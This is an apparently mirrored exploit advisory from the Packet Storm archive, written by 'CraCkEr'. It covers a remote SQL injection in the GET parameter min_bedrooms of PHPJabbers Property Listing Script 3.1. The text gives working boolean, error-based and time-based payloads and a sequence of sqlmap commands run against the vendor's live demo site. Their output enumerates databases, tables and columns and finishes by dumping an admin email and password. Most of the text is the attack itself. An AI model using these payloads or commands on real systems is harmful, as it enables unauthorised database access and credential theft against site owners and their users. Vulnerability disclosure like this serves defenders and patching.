Share
## https://sploitus.com/exploit?id=PACKETSTORM:167757
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ C r a C k E r โโ
โโ T H E C R A C K O F E T E R N A L M I G H T โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโ From The Ashes and Dust Rises An Unimaginable crack.... โโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ [ Exploits ] โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: Author : CraCkEr โ โ :
โ Website : phpjabbers.com โ โ โ
โ Vendor : PHPJABBERS โ โ Property Listing Script โ
โ Software : Property Listing Script 3.1 โ โ โ
โ Vuln Type: Remote SQL Injection โ โ Script will give you โ
โ Method : GET โ โ the tools to efficiently manage โ
โ Critical : High [โโโโโโโโ] โ โ your own real estate portal โ
โ Impact : Database Access โ โ โ
โ โ โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ B4nks-NET irc.b4nks.tk #unix โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: :
โ Release Notes: โ
โ โโโโโโโโโโโโโ โ
โ Typically used for remotely exploitable vulnerabilities that can lead to โ
โ system compromise. โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost
CryptoJob (Twitter) twitter.com/CryptozJob
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ ยฉ CraCkEr 2022 โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Live Demo Site:
https://www.phpjabbers.com/property-listing-script/#sectionDemo
[INFO] GET parameter 'min_bedrooms' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
GET parameter 'min_bedrooms' is vulnerable.
sqlmap identified the following injection point(s) with a total of 414 HTTP(s) requests:
---
Parameter: min_bedrooms (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861
---
sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" --current-db --batch --random-agent --threads 5
[INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.6
[01:13:36] [INFO] fetching current database
[01:13:36] [INFO] retrieved: 'pjabbers_demo_pls'
current database: 'pjabbers_demo_pls'
sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls --tables --batch --random-agent
---
Parameter: min_bedrooms (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861
---
[INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.6
Database: pjabbers_demo_pls
[66 tables]
+----------------------------------------------------------------+
| 1657528735_303_pls_30_property_listing_features |
| 1657528735_303_pls_30_property_listing_fields |
| 1657528735_303_pls_30_property_listing_multi_lang |
| 1657528735_303_pls_30_property_listing_options |
| 1657528735_303_pls_30_property_listing_passwords |
| 1657528735_303_pls_30_property_listing_payments |
| 1657528735_303_pls_30_property_listing_periods |
| 1657528735_303_pls_30_property_listing_plugin_country |
| 1657528735_303_pls_30_property_listing_plugin_galleries_set |
| 1657528735_303_pls_30_property_listing_plugin_gallery |
| 1657528735_303_pls_30_property_listing_plugin_locale_languages |
| 1657528735_303_pls_30_property_listing_plugin_locale |
| 1657528735_303_pls_30_property_listing_plugin_log_config |
| 1657528735_303_pls_30_property_listing_plugin_log |
| 1657528735_303_pls_30_property_listing_plugin_one_admin |
| 1657528735_303_pls_30_property_listing_plugin_paypal |
| 1657528735_303_pls_30_property_listing_plugin_sms |
| 1657528735_303_pls_30_property_listing_properties_features |
| 1657528735_303_pls_30_property_listing_properties |
| 1657528735_303_pls_30_property_listing_roles |
| 1657528735_303_pls_30_property_listing_types |
| 1657528735_303_pls_30_property_listing_users |
| 1657921261_148_pls_30_property_listing_features |
| 1657921261_148_pls_30_property_listing_fields |
| 1657921261_148_pls_30_property_listing_multi_lang |
| 1657921261_148_pls_30_property_listing_options |
| 1657921261_148_pls_30_property_listing_passwords |
| 1657921261_148_pls_30_property_listing_payments |
| 1657921261_148_pls_30_property_listing_periods |
| 1657921261_148_pls_30_property_listing_plugin_country |
| 1657921261_148_pls_30_property_listing_plugin_galleries_set |
| 1657921261_148_pls_30_property_listing_plugin_gallery |
| 1657921261_148_pls_30_property_listing_plugin_locale_languages |
| 1657921261_148_pls_30_property_listing_plugin_locale |
| 1657921261_148_pls_30_property_listing_plugin_log_config |
| 1657921261_148_pls_30_property_listing_plugin_log |
| 1657921261_148_pls_30_property_listing_plugin_one_admin |
| 1657921261_148_pls_30_property_listing_plugin_paypal |
| 1657921261_148_pls_30_property_listing_plugin_sms |
| 1657921261_148_pls_30_property_listing_properties_features |
| 1657921261_148_pls_30_property_listing_properties |
| 1657921261_148_pls_30_property_listing_roles |
| 1657921261_148_pls_30_property_listing_types |
| 1657921261_148_pls_30_property_listing_users |
| pls_30_property_listing_features |
| pls_30_property_listing_fields |
| pls_30_property_listing_multi_lang |
| pls_30_property_listing_options |
| pls_30_property_listing_passwords |
| pls_30_property_listing_payments |
| pls_30_property_listing_periods |
| pls_30_property_listing_plugin_country |
| pls_30_property_listing_plugin_galleries_set |
| pls_30_property_listing_plugin_gallery |
| pls_30_property_listing_plugin_locale |
| pls_30_property_listing_plugin_locale_languages |
| pls_30_property_listing_plugin_log |
| pls_30_property_listing_plugin_log_config |
| pls_30_property_listing_plugin_one_admin |
| pls_30_property_listing_plugin_paypal |
| pls_30_property_listing_plugin_sms |
| pls_30_property_listing_properties |
| pls_30_property_listing_properties_features |
| pls_30_property_listing_roles |
| pls_30_property_listing_types |
| pls_30_property_listing_users |
+----------------------------------------------------------------+
sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users --columns --batch --random-agent
fetching columns for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls'
Database: pjabbers_demo_pls
Table: pls_30_property_listing_users
[12 columns]
+------------+------------------+
| Column | Type |
+------------+------------------+
| created | datetime |
| email | varchar(255) |
| fax | varchar(255) |
| id | int(10) unsigned |
| ip | varchar(15) |
| is_active | enum('T','F') |
| last_login | datetime |
| name | varchar(255) |
| password | blob |
| phone | varchar(255) |
| role_id | int(10) unsigned |
| status | enum('T','F') |
+------------+------------------+
sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users -C email,password --dump --batch --random-agent
fetching entries of column(s) 'email,password' for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls'
Database: pjabbers_demo_pls
Table: pls_30_property_listing_users
[1 entry]
+-----------------+----------+
| email | password |
+-----------------+----------+
| admin@admin.com | P@S13rd |
+-----------------+----------+
[-] Done